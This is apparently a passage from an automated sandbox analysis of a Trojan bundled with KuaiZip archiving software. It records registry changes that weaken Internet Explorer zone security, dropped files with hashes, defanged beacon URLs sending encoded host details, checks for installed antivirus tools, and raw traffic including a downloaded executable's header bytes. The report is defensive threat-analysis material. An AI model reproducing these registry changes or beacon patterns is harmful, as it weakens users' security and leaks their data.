[HKCR\CLSID\{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D7}\InProcServer32]
"(Default)" = "..\Program Files\Common Files\System\safemonn32.dll"

[HKCU\Software\Classes]
"SetupTime" = "2016-04-11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0OverlayIcon]
"(Default)" = "{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D7}"

[HKCU\Software\Classes]
"Update" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 42 F8 53 BE A7 20 84 84 DF 12 85 37 6F 91 B6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\offlinne files]
"(Default)" = "{8D6E9E7B-57C4-4080-AAAE-5DC03C45B9D8}"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"GlobalVer" = "1.0.1.12"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:]
"unit.bat" = "unit"

[HKCU\Software\Microsoft\Windows\CurrentVersion]
"SetupTime" = "2016-04-11"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process at.exe:1788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 58 FA C4 9A 6F B7 3B F3 AC EF 30 EA E9 8B 3A"

The process at.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5B 17 4E 1C DD 56 1E BC FE E0 84 9E EA 52 7E 36"

Dropped PE files

MD5	File path
8cbebe8bf2dc8f62d8e0f1bdc61fe6e4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\FileInfo.dll
6508d7353ceb0a5e1ce3f6d547f9d8e6	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\RCWidgetPlugin.dll
b22e97f113fa16668c8443e3115c6fc6	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss3.tmp\System.dll
18c05429ac641190c246473ddf1bbd98	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\7z.dll
3a2c737509d27c1d68313dd371dc7aa7	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\DiskOpt.exe
d03441593e39f82cd4532caecd4e3aa8	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\DuiLib.dll
90fbba2edef9215952664833f8e60160	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KZFormat.dll
6fc083cc0ca7c9a809ea54ad75d34643	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KZModule.dll
925b6df2e1ebb147af8a348a43cacf0b	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KZMount2.exe
d0984f95f7552d8cb19b61a8899471cb	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KZReport.exe
286683cf098ffddd4d5dd681eca789ec	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KZTui.exe
ad0d12355799b3ba1396fce3aaaa073c	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KZipShell.dll
3aed1d9d2b71dd0ef5e9b312ea68d187	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KuaiZip.exe
fbb06f389086afd3b8c6bb52ad500464	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\KuaiZipDrive.sys
21a7617bd3978b25776956b68a07b0e4	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\Mount.dll
db5da45cd4c1355796ea95fc05acbf74	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\MountCore.dll
4354872f987aec55d65402c74d706829	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\SetupHelper.exe
36cf7a80f981890605d6160caf18b625	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\Uninst.exe
bd027eccff948b726f7b510deed05194	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\Update.exe
90fefe0f5ca65c6dc6e7fc159427bb93	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\UpdateChecker.exe
1f0bce792b0bf938c845cf2d6fc426e9	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\finderlib.dll
575b3ea8ac2d1cca03c4a13cb82aa7a5	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\kuaizipUpdateChecker.dll
5436222ab1bd8b283a2b739dbf490258	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\lang\Chs_Lang.dll
1c915f9fbfe082f23aac2d9b56f34047	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\reportframework.dll
3c86bc87a9e65d5fbc05410816a78d80	c:\Program Files\Â¿Ã¬Ã‘Â¹\X86\sfx\kzSetup_chs.sfx

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: tongkangzhao
Product Name: chunfeidi
Product Version: 7.6.3.2
Legal Copyright: tongkangzhao ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 7.6.3.2
File Description: zhaopingnangdc
Comments: ciaozhao
Language: Chinese (Simplified, PRC)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	872448	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	876544	442368	441344	5.4993	abe4466df29b7dee3ac4e2782b4b159b
.rsrc	1318912	32768	31744	3.18519	1d0c735ae770ae47fa8b7888852e991d

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l8knvnatj20c80gbu12.jpg
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg
hxxp://180.149.135.224/RGHZx7C
hxxp://n4cswhk3.gccdn.net/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg
hxxp://opt.ecoma.ourwebpic.com/n/report/report.txt
hxxp://tj.kpzip.com/kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9ydW4=	123.59.80.92
hxxp://tj.kpzip.com/kuaizipreport/active?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLdWFpWmlwLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJRTQyODMyMTg3NTVCQzM3RTVDQTg4ODc1RjkxQkUzNzM=	123.59.80.92
hxxp://tj.kpzip.com/kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9kb25l	123.59.80.92
hxxp://stat.kpzip.com/stat/index.php?pcid=630eda2537585b8645a6e7879b8a0d8b&app=kuaizip&ver=2.8.14.2&channel=union123_0088&category=KuaiZip.exe&act=app_open&p1=&p2=&key=2f5e2aa5d66794c2de4340db01f67516	180.150.186.16
hxxp://z.gds.cnzz.com/stat.htm?id=1256550373
hxxp://tj.kpzip.com/kuaizipreport/install?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTEJMAlFNDI4MzIxODc1NUJDMzdFNUNBODg4NzVGOTFCRTM3MwkxCUt1YWlaaXBfU2V0dXBfdW5pb24xMjNfMDA4OC5leGUJL0ppbmdNbw==	123.59.80.92
hxxp://tj.kpzip.com/kuaizipreport/online?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCUU0MjgzMjE4NzU1QkMzN0U1Q0E4ODg3NUY5MUJFMzczCSgwPVhQMywxPWFkbSwyPTE0NjAzOTcyNzMsMTQ2MDM5NzI5NiwxNDYwMzk3MzAwKQ==	123.59.80.92
hxxp://opt.ecoma.ourwebpic.com/n/report/queryinfo.xml
hxxp://tj.kpzip.com/kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCTIzNDVoYW96aXAtMDAwfDM2MHppcC0wMDB8N3otMDAwfFdpblJBUi0wMDB8MzYwQVFXUy0wMDA=	123.59.80.92
hxxp://tj.kpzip.com/kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCVFRR0otMDAwfEpTREItMDAwfEJEV1MtMDAwfFJYU0QtMDAwfE5vcnRvbi0wMDA=	123.59.80.92
hxxp://opt.ecoma.ourwebpic.com/n/report/shortcut.xml
hxxp://180.153.147.73/fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240
hxxp://z13.cnzz.com/stat.htm?id=1256550373	1.122.192.16
hxxp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg	83.169.205.18
hxxp://ww1.sinaimg.cn/large/6da25678gw1f1la7wjwlnj20c80gbnpj.jpg	83.169.205.8
hxxp://ww3.sinaimg.cn/large/6da25678gw1f1l8knvnatj20c80gbu12.jpg	83.169.205.18
hxxp://ww4.sinaimg.cn/large/6da25678gw1f1l5qvobehj20c80gbnpk.jpg	151.249.89.195
hxxp://i.kpzip.com/n/report/queryinfo.xml	87.245.198.83
hxxp://i.kpzip.com/n/report/report.txt	87.245.198.83
hxxp://i.kpzip.com/n/report/shortcut.xml	87.245.198.83
hxxp://t.cn/RGHZx7C

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
SURICATA STREAM FIN out of window
SURICATA STREAM SHUTDOWN RST invalid ack

Traffic

GET /stat.htm?id=1256550373 HTTP/1.1

Referer: hXXp://z13.cnzz.com/stat.htm?id=1256550373

Accept: */*

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Content-Type: application/x-www-form-urlencoded

Host: z13.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Mon, 11 Apr 2016 17:53:13 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Thu, 16 Apr 2015 02:22:34 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /RGHZx7C HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: t.cn

Connection: Keep-Alive


HTTP/1.1 302 Found

Location: hXXp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg

Content-Type: text/html;charset=UTF-8

Server: weibo

Content-Length: 246

Date: Mon, 11 Apr 2016 17:52:41 GMT

X-Varnish: 786126080

Age: 0

Via: 1.1 varnish

Connection: keep-alive
<HTML>.<HEAD>.<TITLE>Moved Temporarily</TITLE>
.</HEAD>.<BODY BGCOLOR="#FFFFFF" TEXT="#000000">.<H1>
;Moved Temporarily</H1>.The document has moved <A HREF="http:
//ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg">here&l
t;/A>..</BODY>.</HTML>.HTTP/1.1 302 Found..Location: ht
tp://ww3.sinaimg.cn/large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg..Conten
t-Type: text/html;charset=UTF-8..Server: weibo..Content-Length: 246..D
ate: Mon, 11 Apr 2016 17:52:41 GMT..X-Varnish: 786126080..Age: 0..Via:
 1.1 varnish..Connection: keep-alive..<HTML>.<HEAD>.<TI
TLE>Moved Temporarily</TITLE>.</HEAD>.<BODY BGCOLOR=
"#FFFFFF" TEXT="#000000">.<H1>Moved Temporarily</H1>.Th
e document has moved <A HREF="hXXp://ww3.sinaimg.cn/large/6da25678g
w1f1l8xa7bhsj20c80gbu12.jpg">here</A>..</BODY>.</HTM
L>...

GET /n/report/shortcut.xml HTTP/1.1

Host: i.kpzip.com

Accept: */*


HTTP/1.1 200 OK

Expires: Tue, 12 Apr 2016 03:18:21 GMT

Date: Mon, 11 Apr 2016 03:18:21 GMT

Server: nginx/1.4.1

Content-Type: text/xml

Content-Length: 253

Last-Modified: Thu, 18 Feb 2016 02:56:13 GMT

ETag: "56c532cd-fd"

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 1

X-Via: 1.1 fuzhou185:8080 (Cdn Cache Server V2.0), 1.1 db77:4 (Cdn Cache Server V2.0)

Connection: keep-alive
<?xml version="1.0" encoding="UTF-8"?>..<shortcut>.    <
;simplerule type="url" name=".......url"/>.    <simplerule type=
"url" name="..........url"/>.    <simplerule type="url" name="..
.....url"/>.    <simplerule type="url" name=".......url"/>.&l
t;/shortcut>..

POST /kuaizipreport/jingpin?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLWlJlcG9ydC5leGUJS3VhaVppcAkyLjguMTQuMgkwMDAwMDAwMDAwMDAwMDAwMDAwMQkwRkVCRkJGRjAwMDAwNkZCCTAwLTBDLTI5LTNGLUM5LTMwCU1pY3Jvc29mdCBXaW5kb3dzIFhQCVFRR0otMDAwfEpTREItMDAwfEJEV1MtMDAwfFJYU0QtMDAwfE5vcnRvbi0wMDA= HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:52:24 GMT
c..{"status":1}..0..

GET /n/report/report.txt HTTP/1.1

Host: i.kpzip.com

User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36

Accept:*/*


HTTP/1.1 200 OK

Expires: Tue, 12 Apr 2016 14:44:02 GMT

Date: Mon, 11 Apr 2016 14:44:02 GMT

Server: nginx/1.4.1

Content-Type: text/plain

Content-Length: 131

Last-Modified: Tue, 22 Mar 2016 03:04:47 GMT

ETag: "56f0b64f-83"

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 1

X-Via: 1.1 db78:9 (Cdn Cache Server V2.0)

Connection: keep-alive
[config].URL=hXXp://tj.kpzip.com..[DefaultOpenSoft-].Compress=HKEY_CLA
SS_ROOT\.zip.Browser=HKEY_CLASS_ROOT\http\shell\open\command...

GET /n/report/queryinfo.xml HTTP/1.1

Host: i.kpzip.com

Accept: */*


HTTP/1.1 200 OK

Expires: Tue, 12 Apr 2016 02:44:13 GMT

Date: Mon, 11 Apr 2016 02:44:13 GMT

Server: nginx/1.4.1

Content-Type: text/xml

Content-Length: 2845

Last-Modified: Thu, 18 Feb 2016 02:56:13 GMT

ETag: "56c532cd-b1d"

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 1

X-Via: 1.1 db78:1 (Cdn Cache Server V2.0)

Connection: keep-alive
...<?xml version="1.0" encoding="utf-8"?>..<TheQueryInfo>.
..<QueryProbability value="1000/1000"></QueryProbability>.
..<QueryList>....<QueryItem>.....<QueryName>2345haoz
ip</QueryName>.....<HKeyLocalMachineUninstallDisplayName>2
345......</HKeyLocalMachineUninstallDisplayName>....</QueryIt
em>....<QueryItem>.....<QueryName>360zip</QueryName&
gt;.....<HKeyLocalMachineUninstallDisplayName>360......</HKey
LocalMachineUninstallDisplayName>....</QueryItem>....<Quer
yItem>.....<QueryName>7z</QueryName>.....<HKeyLocalM
achineUninstallDisplayName>7-Zip</HKeyLocalMachineUninstallDispl
ayName>....</QueryItem>....<QueryItem>.....<QueryNam
e>WinRAR</QueryName>.....<HKeyLocalMachineUninstallDisplay
Name>WinRAR</HKeyLocalMachineUninstallDisplayName>....</Qu
eryItem>....<QueryItem>.....<QueryName>360AQWS</Quer
yName>.....<HKeyLocalMachineUninstallDisplayName>360.........
...</HKeyLocalMachineUninstallDisplayName>.....<HKeyLocalMach
ineServicesDisplayName>............</HKeyLocalMachineServicesDis
playName>.....<HKeyLocalMachineServicesChildKeyName>ZhuDongFa
ngYu</HKeyLocalMachineServicesChildKeyName>....</QueryItem>
;....<QueryItem>.....<QueryName>QQGJ</QueryName>....
.<HKeyLocalMachineUninstallDisplayName>............</HKeyLoca
lMachineUninstallDisplayName>.....<HKeyLocalMachineServicesD<<< skipped >>>

GET /n/report/report.txt HTTP/1.1

Host: i.kpzip.com

User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36

Accept:*/*


HTTP/1.1 200 OK

Expires: Tue, 12 Apr 2016 14:44:02 GMT

Date: Mon, 11 Apr 2016 14:44:02 GMT

Server: nginx/1.4.1

Content-Type: text/plain

Content-Length: 131

Last-Modified: Tue, 22 Mar 2016 03:04:47 GMT

ETag: "56f0b64f-83"

Cache-Control: max-age=86400

Accept-Ranges: bytes

Age: 1

X-Via: 1.1 db78:9 (Cdn Cache Server V2.0)

Connection: keep-alive
[config].URL=hXXp://tj.kpzip.com..[DefaultOpenSoft-].Compress=HKEY_CLA
SS_ROOT\.zip.Browser=HKEY_CLASS_ROOT\http\shell\open\command...

POST /kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9kb25l HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:52:13 GMT
c..{"status":1}..0..

GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/6/bjzy3?public&code=bdda3f78ed99e24e0f6f6913dc30f240 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 180.153.147.73

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Mon, 11 Apr 2016 17:21:53 GMT

Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31

Content-Disposition: attachment; filename="bjzy3"

Accept-Ranges: bytes

x-cdmi-object-size: 2198528

x-cdmi-create-time: 2016-03-13 14:08:34

Content-Length: 2198528

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Content-Type: application/octet-stream;charset=UTF-8

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......y.:.=.T.=.T.
=.T..D..x.T..D.. .T..D....T.4...8.T.4...2.T.=.U...T..i..-.T..i..<.T
.=...<.T..i..<.T.Rich=.T.................PE..L......V...........
..........H......m.............@..........................."..........
[email protected].......`l...................P!
.."..`...8............................G..@............................
................text............................... ..`.rdata.........
.....................@[email protected].......\[email protected]
...`l.......n...z..............@[email protected]!....... ............
[email protected].................................................................
......................................................................
......................................................................
......................................................................
.....................................................U..V.u...tP...r..
.;.u..........s....t5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t.....
.^].3.^].U..V........E..t.V..........^]...............................
...U..j.h..B.d.....P.....rC.3..E.VWP.E.d........}.j..u.......E......F.
.....F...F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E.P
.C......h.ZC..E.P.E...C..[V..WV.Q.........M.d......Y_^.M.3........]...
.V..V.p....F,.....t.P.........F,.....F$..t.P.........F$.....F...t.P...
......F......F...t.P.........F......F...t.P.h.......F......F...t.P

<<< skipped >>>

POST /kuaizipreport/stat?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlJbnN0YWxsLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJaW5zdGFsbF9ydW4= HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:51:52 GMT
c..{"status":1}..0..

POST /kuaizipreport/active?code=dW5pb24xMjNfMDA4ODE2MDQxMQk4NEFFQjMyMzlGQUJBOUVCMzc0ODVDRjQzM0U5MzM5MAlLdWFpWmlwLmV4ZQlLdWFpWmlwCTIuOC4xNC4yCTAwMDAwMDAwMDAwMDAwMDAwMDAxCTBGRUJGQkZGMDAwMDA2RkIJMDAtMEMtMjktM0YtQzktMzAJTWljcm9zb2Z0IFdpbmRvd3MgWFAJRTQyODMyMTg3NTVCQzM3RTVDQTg4ODc1RjkxQkUzNzM= HTTP/1.1

Host: tj.kpzip.com

Accept: */*

Content-Length: 0


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Transfer-Encoding: chunked

Date: Mon, 11 Apr 2016 17:52:12 GMT
c..{"status":1}..0..

GET /large/6da25678gw1f1l8knvnatj20c80gbu12.jpg HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: ww3.sinaimg.cn


HTTP/1.1 200 OK

Date: Mon, 11 Apr 2016 17:52:22 GMT

Server: PWS/8.1.36

X-Px: ms h0-s1013.v0-voz ( h0-s1008.v0-voz), ms h0-s1008.v0-voz ( h0-s1326.p0-kix), ht-d h0-s1326.p0-kix.cdngp.net

Cache-Control: max-age=7776000

Expires: Sat, 02 Jul 2016 16:05:12 GMT

Age: 697630

Accept-Ranges: bytes

Content-Length: 7238736

Content-Type: image/jpeg

Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT

X-Via-CDN: f=TXCDN,s=83.169.205.18,c=37.57.16.189

Connection: keep-alive
......JFIF.............C..............................................
......................C...............................................
........................K...."........................................
.L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&
45c....................................;.......................!..1.."
AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..
!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C
.$.....\.... .[..$J....E.]/[email protected]...$ y.d.HjSX.d.).P...>in.@.&. <
;....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}
...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7
N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.
&....4JjWM../$..).;[email protected].@..#..=...."....M...\.B...
..I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.][email protected]..:..
@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .
4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H [email protected]?$..
..7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.
....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.
%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#.  ..[......RCr...6..d....
.D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p
..^.%.... [email protected].].B..d...J.A-.$..mR..._
..a..B...].`.r.G4.I'K].t\...."...........).5"N......<2X..3..r$hoR7.
?.UtG.B....!u.b<}GF.d.H..V.D.:[email protected]...:jx..el......m....Mp.].s<<< skipped >>>

GET /large/6da25678gw1f1l8xa7bhsj20c80gbu12.jpg HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: ww3.sinaimg.cn


HTTP/1.1 200 OK

Date: Mon, 11 Apr 2016 17:52:41 GMT

Server: PWS/8.1.36

X-Px: ms h0-s1013.v0-voz ( h0-s1012.v0-voz), ms h0-s1012.v0-voz ( h0-s1346.p0-kix), ht-d h0-s1346.p0-kix.cdngp.net

Cache-Control: max-age=7776000

Expires: Sun, 03 Jul 2016 13:39:51 GMT

Age: 619971

Accept-Ranges: bytes

Content-Length: 7238736

Content-Type: image/jpeg

Last-Modified: Mon, 08 Jul 2013 18:06:40 GMT

X-Via-CDN: f=TXCDN,s=83.169.205.18,c=37.57.16.189

Connection: keep-alive
......JFIF.............C..............................................
......................C...............................................
........................K...."........................................
.L.........................!1.AQ.."aq..2...B...#...3Rbr..$C....%....S&
45c....................................;.......................!..1.."
AQa2q........#B...3.R.$Kr............?.... ...k....Y _o.#P.@@....$..
!..SP...@...(..d9"J.T..nQ..[%.F. Y.|. .8@y%.!.G......l....M.$.(..0...C
.$.....\.... .[..$J....E.]/[email protected]...$ y.d.HjSX.d.).P...>in.@.&. <
;....hE.-..... ..!..........$o......B ........HB...........[D.@BI$...}
...T.]-..R%"...t.Q.P.M.%"uA..\.v.].......K.).&...4.{.4.........t@!J. 7
N..D".4~.s.h.n.I..E.H$7G.k...l.E4A.W..%k&6!jQ..B.4p.A... .!..Gd..j.WB.
&....4JjWM../$..).;[email protected].@..#..=...."....M...\.B...
..I±.Dv......A..D...!......(.W@......$...}.v)..A...Z.][email protected]..:..
@.. ..<...M..)n..;f..rJ.(...4A..$R...".$.\..`.d.G`...BH..V....D%. .
4.#R.J.....J....[%t6D..nR(..4...H.i....I5.WF.sI!..n.@$ .H [email protected]?$..
..7.h... ..=RHC..H..!...b..J.....)...k..d.$...&.O.....!t......\uK...B.
....j.lxJ[..I5.[z..I....M.Cdo.D...I"......%1.......i..hV. ...4@)$u.I$.
%..I]6..{.wI .!..n.) ..i.Q.[&...!.N. BB.A X#.  ..[......RCr...6..d....
.D.CC....4D.........Cd.H$...&.$..4.@..\. .(. .{.....W@.%pSG$.n.47..w@p
..^.%.... [email protected].].B..d...J.A-.$..mR..._
